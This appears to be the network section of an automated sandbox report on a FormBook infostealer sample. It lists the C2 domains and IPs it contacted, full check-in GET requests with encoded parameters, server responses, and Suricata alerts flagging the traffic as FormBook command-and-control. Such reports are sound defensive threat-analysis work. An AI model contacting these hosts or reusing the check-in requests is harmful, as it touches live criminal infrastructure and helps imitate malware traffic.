Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.elsonidodelacalle.com | 209.99.64.55 | |
| www.conveniencestorelosangeles.com | 52.44.94.227 |
GET
200
http://www.elsonidodelacalle.com/m3n0/?FPWhH4Y=m4MFs36Ucpj1GyErAGBxkzm4FiJMt3pbCU5S1e6L9Cs2CafjD4xrmEyE6l1gxjHDfcxPRFuP&Bl=lHUl2XmxXLc
REQUEST
RESPONSE
BODY
GET /m3n0/?FPWhH4Y=m4MFs36Ucpj1GyErAGBxkzm4FiJMt3pbCU5S1e6L9Cs2CafjD4xrmEyE6l1gxjHDfcxPRFuP&Bl=lHUl2XmxXLc HTTP/1.1
Host: www.elsonidodelacalle.com
Connection: close
HTTP/1.1 200 OK
Date: Fri, 20 Aug 2021 00:38:11 GMT
Server: Apache
Set-Cookie: vsid=929vr3769654916939351; expires=Wed, 19-Aug-2026 00:38:11 GMT; Max-Age=157680000; path=/; domain=www.elsonidodelacalle.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Yp2jvxki5ycdQ/gAEj+s0ENrm/mcc8lSUMMhdVEIkFmbXSfMgbgTReCqP84MJ7/TAgU4X4BKMUnVrkGp0uvG9Q==
Keep-Alive: timeout=5, max=111
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET
301
http://www.conveniencestorelosangeles.com/m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc
REQUEST
RESPONSE
BODY
GET /m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc HTTP/1.1
Host: www.conveniencestorelosangeles.com
Connection: close
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Fri, 20 Aug 2021 00:38:50 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
Location: https://www.conveniencestorelosangeles.com/m3n0/?FPWhH4Y=Y8aNBIvgUljk+Y154DjGmLXqNUZReizFXju5Ab+xsn7ClCWV4MsKuafR6FKqj9jPN8Yt2Da/&Bl=lHUl2XmxXLc
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49167 -> 52.44.94.227:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49167 -> 52.44.94.227:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49167 -> 52.44.94.227:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49166 -> 209.99.64.55:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49166 -> 209.99.64.55:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.102:49166 -> 209.99.64.55:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts